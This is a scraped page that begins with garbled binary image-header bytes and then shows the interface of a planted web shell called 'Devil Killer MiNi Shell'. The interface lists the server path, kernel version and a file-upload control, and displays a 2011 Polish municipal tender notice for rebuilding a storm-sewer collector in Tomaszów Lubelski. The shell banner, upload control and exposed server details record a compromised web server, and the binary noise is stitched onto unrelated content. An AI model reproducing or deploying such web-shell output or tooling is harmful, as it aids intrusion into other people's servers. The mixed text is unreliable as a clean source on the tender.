JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/137424-N-2011.html

<p class="kh_header"><b>Tomaszów Lubelski: Wykonania przebudowy kolektora kanalizacji deszczowej przy ulicy Rymarskiej 
w Tomaszowie Lubelskim</b><br>
<b>Numer ogłoszenia: 137424 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta w Tomaszowie Lubelskim , ul. Lwowska 57, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6642125, faks 084 664 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-lubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonania przebudowy kolektora kanalizacji deszczowej przy ulicy Rymarskiej 
w Tomaszowie Lubelskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa kolektora kanalizacji deszczowej przy ulicy Rymarskiej w Tomaszowie Lubelskim, wg. dwóch opracowanych Projektów Budowlano - Wykonawczych:
1.Przebudowa kolektora kanalizacji deszczowej przy ul. Rymarskiej w Tomaszowie Lubelskim dotyczy odcinka D1-D6,
Przedmiot zamówienia obejmuje między innymi:
-usuniecie warstwy ziemi urodzajnej (humusu) o grubości do 15 cm za pomocą
spycharek - 382,20 m2;
-wykopy liniowe pod fundamenty, rurociągi, kolektory w gruntach suchych 
kat. I - II z wydobyciem urobku łopatą lub wyciągiem ręcznym
głęb. do 3 m, szer. 1,6-2,5m - 145,5 m3; 
-wykopy liniowe pod fundamenty, rurociągi, kolektory w gr. suchych kat. I - II 
z wydobyciem urobku łopatą lub wyciągiem ręcznym gł. do 6 m, szer. 2,6-4,5 m - 14,0 m3;
-wykopy oraz przekopy wykonywane koparkami podsiębiernymi 0,60 m3 na odkład
w gruncie kat. I-II. Grunt oblepiający naczynie robocze.- 869,5 m3; 
-pełne umocnienie ścian wykopów (wraz z rozbiórką) SBH typu standard Boks SBH
oraz typu słupowo-rozporowych np. podlaskie 3 lub szalunkowa komora dylowa
SBH (w miejscach kolizji z uzbrojeniem podziemnym) oraz typu podlaskie 1 z 
zastosowaniem słupa narożnego (wykopy pod komory osadnika wirowego i separatora)
wciskanych w trakcie pogłębiania wykopów. Założenie do kalkulacji:
 -koszt montażu, rozbiórki i utrzymania w okresie wykonywania i zasypywania 
wykopów = 10,43 zł/m2;
 - okres utrzymania przy pozostałych robotach montażowych (przy pracy 2-zmianowej i 4 pracownikach na zmianę = 1560 m-g.
 - cena utrzymania=0,025 zł/m-g za 1 m2 umocnienia w okresie trwania pozostałych
robót montażowych wynosi = 0,025 x 1560 m-g = 39 zł/m2 - 998,0 m2;
-demontaż rurociągu o śr. nom. 600 mm - 7,5 m;
-igłofiltry o śr. 32 mm z osiatkowanym filtrem o dł. 1,0 m, filtry montażowe przy
użyciu rury wpłukującej 133 mm - 223,0 szt. 
-ława betonowa z betonu B 15 o gr. 15 cm i szerokości 1,7 m - 280,0 m2;
-rury kielichowe żelbetowe WIPRO z betonu B55, kl. wytrzymałości II o śr. 1200 mm
uszczelniane uszczelką gumową odcinek D1-D2 - 12,5 m;
-rury kielichowe żelbetowe WIPRO z betonu B55, kl. wytrzymałości II o śr. 1000 mm
uszczelniane uszczelką gumową odcinek D2-D6 - 149,5 m;
-obetonowanie kanałów - beton B 15 w pachwinach - 102,0 m3;
-izolacja obetonowania kanałów WIPRO o śr. 1000 mm abizolem (P) dwukrotne - 546,0 m2
- warstwa ochronna zasypu (0,3m ponad wierzch rury) z piasku (o maks. wielkości
ziaren 2 mm) - szerokość 1,6-2,5 m - 320,0 m3
-studnie kanalizacyjne prefabrykowane ECOL-UNICON o śr. 1500 mm w gotowym
wykopie o głębokości 3 m - 5,0 stud. 
-zasypanie wykopów spycharkami z przemieszczeniem gruntu na odl. do 10 m
w gruncie kat. I-II zasypka piaskiem - 332,0 m3;
-nawierzchnia z płyt wielootworowych (płyty o pow. do 1 m2) - budowa - (technologia wyk. zgodnie z opisem technicznym projektu) - 340,0 m2
i inne roboty określone w projekcie budowlano-wykonawczym, przedmiarach robót
i Specyfikacji wykonania i odbioru robót budowlanych.
2.Przebudowa odcinka kanału deszczowego ul. Rymarskiej z wylotem betonowym do rzeki Sołokija w Tomaszowie Lubelskim na działkach Nr 101, 118,135, 222/2, 179/2.
1.Branża budowlana:
-przygotowanie i montaż zbrojenia ławy betonowej - pręt żebrowany ze stali
A-III o śr. 10 mm - 1,206 t
-ława betonowa z betonu B15 pod kanały deszczowe i studnie- 17,580 m3
-izolacja zewnętrznej powierzchni obetonowania kanałów i studni abizolem (P) dwukrotnie - 9,0 m;
-ława betonowa z betonu B20 pod wylot deszczowym - 2,45 m3;
-montaż balustrady stalowej z malowaniem - 36,4 m;
-wykonanie palisady z pali żelbetowych o śr. 150 mm i dł. 250 cm - 10,0 m;
-roboty ziemne wykon. koparkami przedsiębiernymi o poj. łyżki 0,40 m3 w gr. kat. III z transp. urobku samochodem samowyładowczym na odl. do 1 km - 43,8 m3; 
-podbudowa wykonana ręcznie z piasku stabilizowanego cementem	- 73,0 m2;
-podbudowa z betonu B 7,5 grub. warstwy po zagęszczeniu 12 cm - 73,0 m2;
-nawierzchnie z kostki brukowej betonowej grub. 8 cm na podsypce piaskowe - 73,0 m2
2.Branża sanitarna ( kanalizacja deszczowa): 
-mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o gr. 3cm - 78,0 m2;
-wykopy liniowe pod fundamentu, rurociągi, kolektory w gruntach suchych kat. I-II z wydobyciem urobku łopata lub wyciągiem ręcznym głęb. do 6 m - szer. 2,6-4,5 m - 37,0 m3;
-ręczne roboty ziemne z transportem urobku samochodami samowyładowczymi 
 (kat. gr. I-II). Grunt uprzednio odspojony - 135,0 m3;
-roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 1,20 m3 w gr. kat. I-II
z transportem urobku samochodem samowyładowczym na odległość do 1 km - 478,0 m3; 
-pełne umocnienie ścian wykopów (wraz z rozbiórką) SBH typu STANDARD BOKS
 SBH oraz typu słupowo-rozporowych np. PODLASKIE 3 lub SZALUNKOWA
KOMORA DYLOWA SBH (w miejscach kolizji z uzbrojeniem podziemnym) oraz
typu PODLASKIE 1 z zastosowaniem słupa narożnego (wykopy pod komory
osadnika wirowego i separatora) wciskanych w trakcie pogłębiania wykopów.
Założenia do kalkulacji:
-koszt montażu, rozbiórki i utrzymania w okresie wykonywania i zasypywania
wykopów = 10,43 zł/m2;
-okres utrzymania przy pozostałych robotach montażowych (przy pracy 2- zmianowej i 4 pracownikach na zmianę = 1560 m-g;
- cena utrzymania = 0,025 zł/m-g za 1 m2 umocnienia w okresie trwania pozostałych robót montażowych wynosi = 0,025 x 1560 m-g = 39 zł/m2 - 710,0 m2;
-igłofiltry o śr. 32 mm z osiatkowanym filtrem o dł. 1,0 m, filtry montowane przy
użyciu rury wpłukującej 133 mm. - 353,0 szt.;
-demontaż rurociągu kamionkowego kielichowego o śr. nom. 1000 mm uszczelnionego cementem-wykopy nawodnione - rury długości 1,5 m - 22,0 m; 
-demontaż studni rewizyjnych z kręgów betonowych o śr. 1200 mm w gotowym
wykopie o gł. 3 m - wykopy nawodnione - 2,0 kpl.;
-warstwa stabilizacyjno-filtracyjna ze żwiru 5-63 mm gr. 20 cm - 29,5 m3 ;
-rury kielichowe żelbetowe WIBRO kl. wytrzymałości II o śr. 1000 mm uszczelniane
uszczelką gumową - wykopy umocnione nawodnione - 4,5 m;
-rury kielichowe żelbetowe WIBRO kl. wytrzymałości III o śr. 1000 mm uszczelniane
 uszczelką gumową - wykopy umocnione nawodnione - 3,0 m;
-rury kielichowe żelbetowe WIBRO kl. wytrzymałości III o śr. 1200 mm uszczelniane
uszczelką gumową - wykopy umocnione nawodnione - 27,5 m;
-kanały z rur strukturalnych PVC-U typu PROCOR o sztywności SN8 łączonych na 
kielichy z uszczel. pierścieniem gumowym o śr. nom. 1000mm-wykopy umocnione - 3,5 m ; 
-kanały z rur strukturalnych PVC-U typu PROCOR o sztywności SN8 łączonych na 
kielichy z uszczel. pierścieniem gumowym o śr. nom. 600mm-wykopy umocnione - 20,0 m;
-studnie kanalizacyjne prefabrykowane ECOL-UNICON o śr. 2000 mm w gotowym
wykopie o głębokości 3m - 3,0 stud.;
-studnie kanalizacyjne prefabrykowane ECOL-UNICON o śr. 1200 mm w gotowym
wykopie o głębokości 3m - 3,0 stud.;
- osadnik OS poziomy na bazie systemu studni żelbetowej BETRAS o śr. 1200 mm
w gotowym wykopie o głębokości 3m - 1,0 stud.;
-osadnik wirowy V2B1-17 ECOL-UNICON składający się z: komory osadnika 1 o śr.
3000mm z wklejonym króćcem do przyłączenia rury WIPRO 1000 mm i z rurociągiem
łączącym komory (dostawa przez producenta urządzenia) o wys. całkowitej 4,82m
oraz z komory osadnika 2 o śr. 2000mm o wys. całkowitej 4.82m - 2,0 stud.;
-separator Lamellowy PSW LAMELA S prod. ECOL-UNICIN o śr. 2500mm	      - 1,0 stud.
-otwory w studniach ECOL-UNICON dla przejść szczelnych rur PVC-U PROCOR
 o śr. 200mm, 600mm, 1000mm, oraz dla rur WIPRO o śr. 1000mm i 1200mm,
 wykonane przez producenta studni wraz z systemowym przejściem szczelnym dla rur
 - PROCOR i wklejane żywicą epoksydową dla rur WIPRO.
 - dla rur PVC-U o śr. nom. 200 - 1 szt.
 - dla rur PVC-U o śr. nom. 600 - 7 szt.
 - dla rur PVC-U o śr. nom. 1000 -2 szt.
 - dla rur WIPRO z uszczelkami WIPRO MSK o śr. nom 1000mm - 2szt.
 - dla rur WIPRO z uszczelkami WIPRO MSK o śr. nom 1200mm - 3szt.	        -15,0 szt.
- warstwa ochronna zasypu (0,3m ponad wierzch rury) z piasku (o maks. wielkości
ziaren 2mm) - szerokość 1,6-2,6 m - 84,0 m3; 
-zasypywanie wykopów spycharkami z przemieszczeniem gruntu na odl. do 10 m w 
gruncie kat. I-III. Praca spycharkami w gruncie oblepiającym gąsienice - 185,0 m3
3. Branża sanitarna (przebudowa odcinka sieci wodociągowej):
-wykopy liniowe pod fundament, rurociągi, kolektory w gruntach suchych kat. I-II
z wydobyciem urobku łopata lub wyciągiem ręcznym do 3 m - szer. 0,8-1,5 m - 35,0 m3
-rura osłonowa PE 100 SDR 26 125x4,8mm L=10,2 m - grunty nawodnione - 10,2 m 
-przeciąganie rurociągu PE 63 w rurze osłonowej PE 125 (płozy INTEGRA 50-B-24
 -4 szt. i 50-B-17-4 szt., końcówki rury osłonowej uszczelnione pianką poliuretanową) -10,2 m
-sieci wodociągowe w miastach - kształtki żeliwne ciśnieniowe kołnierzowe o śr. nom. 50 mm - wykopy umocnione nawodnione - 11,0 szt.
-zasypanie wykopów liniowych o ścianach pionowych piaskiem - szer. 0,8-1,5 m - 31,0 m3
i inne roboty określone w projekcie budowlano-wykonawczym, przedmiarach robót
i Specyfikacji wykonania i odbioru robót budowlanych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.10.00-8, 45.23.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zainteresowany postępowaniem o udzielenie zamówienia publicznego wniesie wadium w wysokości  20 000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>.1. W postępowaniu mogą wziąć udział wykonawcy , którzy spełniają warunki określone w art. 22 ust. 1 ustawy  Prawo zamówień publicznych dotyczące:    
a)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania;        
b)posiadania wiedzy i doświadczenia, 
c)dysponowania odpowiednim  potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 
d)sytuacji ekonomicznej i finansowej; 
e)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w oparciu o art. 24, ust. 1 i 2 wyżej cytowanej ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Od Wykonawcy  Zamawiający wymaga, aby wykazał się doświadczeniem wykonania już co najmniej 2 robót sanitarnych - wykonania rurociągów kanalizacji sanitarnej lub deszczowej z użyciem rur o średnicy  1000mm,  na długości co najmniej 20 m każda. 
 Wykonawcy przedłożą w ofercie wykaz robót budowlanych wg Załącznika Nr 3 do SIWZ -  Wykaz ważniejszych realizacji w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz  załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone , np.  referencje, protokóły odbioru, itp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy do oferty wykazu narzędzi wg Załącznika Nr 4, wyposażenia zakładu i urządzeń technicznych  dostępnych wykonawcy robót budowlanych w celu realizacji zamówienia  wraz z  informacją o podstawie dysponowania tymi zasobami; Zamawiający wymaga aby wykonawca wykazał się możliwością dysponowania co najmniej  następującym sprzętem :
- koparka - 1 szt.
- spycharka gąsienicowa - 1 szt.
- betoniarka - 1 szt.
- wibrator powierzchniowy - 1 szt. 
- samochodów samowyładowczych - 1 szt</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz osób wg Załącznika Nr 5, które będą uczestniczyć 
w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,
Oświadczenia, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Wykonawca załączy do oferty oświadczenie, że osoby wyznaczone do nadzorowania robót posiadają odpowiednie uprawnienia budowlane w branży sanitarnej z przynależnością do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by wykonawca  przedstawił :
a)informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania  wniosków o dopuszczenie do  udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
b)Zamawiający wymaga by wykonawca dysponował środkami finansowymi lub zdolnością kredytową w wysokości co najmniej 100 000,00 zł,
c)jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.
d)jeżeli wykonawca, wykazując spełnienie warunku, o którym mowa w art. 22, ust. 1, pkt. 4 ustawy (dot. sytuacji ekonomicznej i finansowej) polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26, ust. 2b ustawy Pzp, wymaga przedłożenia informacji z banku, jak w pkt. 5.4.lit. (a) i (b) niniejszej SIWZ, dotyczącej tych podmiotów,
e)opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z prowadzeniem robót.
Warunek ten Zamawiający uzna za spełniony, jeżeli wykonawca składający ofertę jako firma lub osoba fizyczna udokumentuje posiadanie  wymienionych wyżej środków finansowych na koncie w banku i przedstawi w ofercie poświadczone ksero żądanej polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

